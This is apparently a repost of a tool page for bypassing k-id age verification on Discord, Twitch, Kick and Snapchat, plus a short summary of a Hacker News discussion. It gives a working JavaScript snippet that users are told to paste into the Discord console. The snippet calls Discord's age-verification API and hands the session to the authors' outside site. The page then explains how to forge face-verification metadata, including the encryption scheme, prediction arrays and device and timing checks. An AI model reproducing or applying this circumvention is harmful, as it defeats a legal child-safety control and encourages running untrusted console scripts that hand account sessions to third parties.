Discord/Twitch/Snapchat age verification bypass

Original link: https://age-verifier.kibty.town/

## Age verification bypass for Discord and other platforms

The tool, built by xyzeva and Dziurwa (on earlier work by amplitudes), automatically verifies age on platforms that use k-id (such as Discord), ahead of the global rollout in March. It works by sidestepping k-id's face-verification flow *without* sending any real face data. The tool uses a script pasted into the Discord console (opened with F12) to talk to the Discord API. For Discord it redirects you to the verification page; for other platforms (Twitch, Kick, etc.) you enter the URL of the QR code from their age-verification flow. k-id relies on metadata about your face rather than the image itself. The tool generates legitimate-looking metadata, bypassing the checks implemented by k-id's partner Faceassure. It replicates the encryption step (AES-GCM) and accurately predicts the key data points used in k-id's verification (outputs, primaryOutputs, raws), including the device and timing checks. The whole thing is open source, so users can inspect the code and understand exactly how the bypass works.

A discussion appeared on Hacker News about bypassing the age verification systems used by platforms such as Discord, Twitch and Snapchat (kibty.town). The central point is that the current methods, most likely face scans or ID checks, are easy to circumvent. Users suggested feeding synthetic video to fool webcam-based verification and argued that even requiring a phone camera would not hold up for long, since a screen can stand in for a face. The thread highlights the cat-and-mouse game of digital age verification and questions how effective these systems are. One commenter noted that platforms may simply be satisfying regulatory requirements rather than addressing liability, given how easily the checks are bypassed. There was also speculation about how soon the platforms will try to fix this hole.

Original text

age verifies your account automatically as an adult on any website using k-id

made by xyzeva and Dziurwa, greetz to amplitudes (for previous work)

how to verify on discord

it doesn't matter if you are in the UK or a similar region that currently has access to this; this will verify your account for the global rollout in march as well as for the current one. to use, simply paste this script into your discord console: go to discord.com/app, press F12, go to Console, paste the following script and hit enter, then solve the captcha that pops up (type "allow pasting" first if necessary):

```javascript
// add a chunk to get all of the webpack chunks
_mods = webpackChunkdiscord_app.push([[Symbol()],{},r=>r.c]);
webpackChunkdiscord_app.pop(); // cleanup the chunk we added

// utility to find a webpack chunk by property
findByProps = (...props) => {
    for (let m of Object.values(_mods)) {
        try {
            if (!m.exports || m.exports === window) continue;
            if (props.every((x) => m.exports?.[x])) return m.exports;

            for (let ex in m.exports) {
                if (props.every((x) => m.exports?.[ex]?.[x]) && m.exports[ex][Symbol.toStringTag] !== 'IntlMessagesProxy') return m.exports[ex];
            }
        } catch {}
    }
}

// find the discord api client
api = findByProps('Bo','oh').Bo

// send a api request to discord /age-verification/verify and then redirect the page to our website
window.location.href = `https://age-verifier.kibty.town/webview?url=${encodeURIComponent((await api.post({ url: '/age-verification/verify', body: { method: 3 }})).body.verification_webview_url)}`
```

(feel free to read the code, we made it readable and we have nothing to hide)

it should navigate to a link (or give you a link to navigate to); from there, you can just wait until the page says success

congrats! your discord account is now age verified.

how to verify on other platforms (twitch, kick, snapchat, ...others)

navigate to the age verification page and choose selfie; from there, get the url of the qr code, put it in this input box, and press verify

how does this work

k-id, the age verification provider discord uses, doesn't store or send your face to the server. instead, it sends a bunch of metadata about your face and general process details. while this is good for your privacy (well, considering some other providers send actual videos of your face to their servers), it's also bad for them, because we can just send legitimate-looking metadata to their servers and they have no way to tell it's not legitimate.
while this was easy in the past, k-id's partner for face verification (faceassure) made this significantly harder after amplitudes' k-id verifier was released (which doesn't work anymore because of it).

with discord's decision to make the age verification requirement global, we decided to look into it again to see if we could bypass the new checks.

step 1: encrypted_payload and auth_tag

the first thing we noticed when comparing a legitimate request payload with a generated one is that the old implementation is missing encrypted_payload, auth_tag, timestamp and iv in the body.

looking at the code, this appears to be a simple AES-GCM cipher, with the key derived via HKDF (sha256) from nonce + timestamp + transaction_id. we can easily replicate this and create the missing parameters in our generated output.

step 2: prediction data

here's where it gets a bit tricky: even after perfectly replicating the encryption, our verification attempt still doesn't succeed, so they must also be checking the actual payload.

after some trial and error, we narrowed the checked part down to the prediction arrays: outputs, primaryOutputs and raws.

it turns out both outputs and primaryOutputs are generated from raws. basically, the raw numbers are mapped to age outputs, and then the outliers are removed using z-scores (once for primaryOutputs and twice for outputs).

there are also some other differences:

  • xScaledShiftAmt and yScaledShiftAmt in predictions are not random but rather can be one of two values
  • it is checked that the media name (camera) matches one of your media devices in the array of devices
  • it is checked that the states' completion times match the state timeline


with all of that done, all of this code is open source and available, so you can see exactly how we do this.
